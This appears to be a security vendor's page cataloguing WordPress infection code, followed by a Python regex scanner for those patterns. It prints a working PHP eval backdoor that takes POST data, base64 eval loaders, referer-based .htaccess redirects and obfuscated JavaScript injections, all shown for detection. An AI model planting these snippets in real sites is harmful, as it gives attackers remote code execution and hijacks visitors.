
WordPress tampering code examples


Mass generation of .suspected files in the site

Many files with the extension .suspected are generated in a writable folder in WordPress. The code is as follows:

$mdgv0="pt_os"; $zxd9=strtoupper ($mdgv0[2]. $mdgv0[0]. $mdgv0[3].$mdgv0[4]. $mdgv0[1]);if(isset (${ $zxd9 } [ 'qab6e1b' ] ) ) { eval (${$zxd9 } ['qab6e1b'] ) ;} 

This code rearranges the characters of pt_os to build the string _post (upper-cased to _POST by strtoupper), reads the POST data, and runs it as a program with the eval function. This code is very dangerous because it lets hackers execute programs on the site.

Almost all posts have the string <a style="text-decoration: none" href="/plendil-buy-….">.</a>

This code is called SEO spam. It is a hack that inserts links to the domain indicated by href= in order to boost that domain's SEO. Since the character string is inserted into the posts themselves, it is done by taking over administrator privileges and using other vulnerabilities.

base64_decode

An example of this type of tampering code is as follows. A base64-encoded character string, which is difficult for humans to read, is decoded with base64_decode, returned to the program, and executed as a statement with eval. The decoded content includes a spam mail sending program.

eval(base64_decode("aWYoZnVuY3Rpb25f....jgfSAgfQ=="));?>

Mass generation of .htaccess files

A lot of unnecessary .htaccess files are generated in various folders. Their content is code that misdirects visitors to other sites, such as redirect processing. When an access matches a specific character string (in the rules below, in the Referer header), it is redirected to the page the attacker wants traffic to flow to.

RewriteCond %{HTTP_REFERER} ^.*(google|ask....suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuch....indloo|kobala|limier)\.(.*)
RewriteRule ^(.*)$ http://[ link redacted ] [R=301,L]

Tampering at the end of JavaScript files

The tampering code is appended to the end of JavaScript files that WordPress uses as standard, such as jQuery. The code starts with an illegible comment like /*76we65sadradfyfa…62qetafduaygdau*/, and the code part contains a lot of obfuscated code like \x32\x32\x32\x32\x32\x32.

/*76we65sadradfyfa...62qetafduaygdau*/
window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"] ["\x66\x6....
/*76we65sadradfyfa...62qetafduaygdau*/

eval(function(p,a,c,k,e,d) statement added to JavaScript files

This type of hack is also embedded in JavaScript files. Code containing an obfuscated program that starts with eval(function(p,a,c,k,e,d) is executed.

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1}....

Tampering code mixed into header.php and footer.php

Examples of tampering

echo base64_decode("VZAAtb5swEP....asdAA78kja");
@include_once("../wp-includes/gy2tI.php");

Please detect this code using our plugin.
WordPress Doctor Malware Scan & Security Plug-in
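
The tampering patterns listed on this page can also be checked with a few regular expressions. The following Python scanner is an added example, not code from the original page or from the plugin it mentions; the rule names, the scan_text and scan_tree helpers, and the sample files are constructed for illustration, and the rules are heuristics that can flag legitimate code.

```python
import os
import re

# Heuristic signatures modelled on the snippets shown on this page (rule names are assumed).
RULES = {
    # eval(base64_decode("...")) or echo base64_decode("...")
    "base64-payload": re.compile(r"\b(?:eval|echo)\s*\(?\s*base64_decode\s*\(", re.I),
    # eval(${$var}['key']): eval of request data reached through a variable variable
    "eval-variable-variable": re.compile(r"\beval\s*\(\s*\$\{\s*\$\w+\s*\}\s*\[", re.I),
    # Packed JavaScript: eval(function(p,a,c,k,e,d){...
    "js-packer": re.compile(
        r"\beval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)"),
    # Six or more \xNN escapes in a row, allowing "+" string concatenation between them
    "js-hex-escapes": re.compile(r'(?:\\x[0-9a-fA-F]{2}(?:"\s*\+\s*")?){6,}'),
    # RewriteCond on the Referer followed by an external 301/302 RewriteRule
    "htaccess-referer-redirect": re.compile(
        r"RewriteCond\s+%\{HTTP_REFERER\}.*\n\s*RewriteRule\s+\S+\s+https?://\S.*\[[^\]]*R=30[12]",
        re.I),
}
SCAN_SUFFIXES = (".php", ".js", ".htaccess", ".suspected")

# Constructed sample files (not real infections); redirect.example is a placeholder domain.
SAMPLES = {
    "cache.php.suspected": '<?php $a="pt_os"; $b=strtoupper($a[2].$a[0].$a[3].$a[4].$a[1]);'
                           'if(isset(${$b}["k"])){eval(${$b}["k"]);}',
    "footer.php": '<?php eval(base64_decode("UExBQ0VIT0xERVI="));?>',
    ".htaccess": "RewriteCond %{HTTP_REFERER} ^.*(google|ask)\\.(.*)\n"
                 "RewriteRule ^(.*)$ http://redirect.example/ [R=301,L]\n",
    "jquery.js": r'window["\x64\x6f"+"\x63\x75"+"\x6d\x65"+"\x6e\x74"];',
    "clean.php": "<?php echo esc_html( get_the_title() ); ?>",
}

def scan_text(text):
    """Return the sorted names of all rules that match the given file content."""
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan_tree(root):
    """Walk a WordPress directory and return {path: [findings]} for flagged files."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            path = os.path.join(dirpath, fname)
            hits = ["suspected-extension"] if fname.endswith(".suspected") else []
            if fname.endswith(SCAN_SUFFIXES):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits += scan_text(fh.read())
            if hits:
                findings[path] = hits
    return findings
```

Run scan_tree against a copy or backup of the site directory and review each hit by hand before deleting anything.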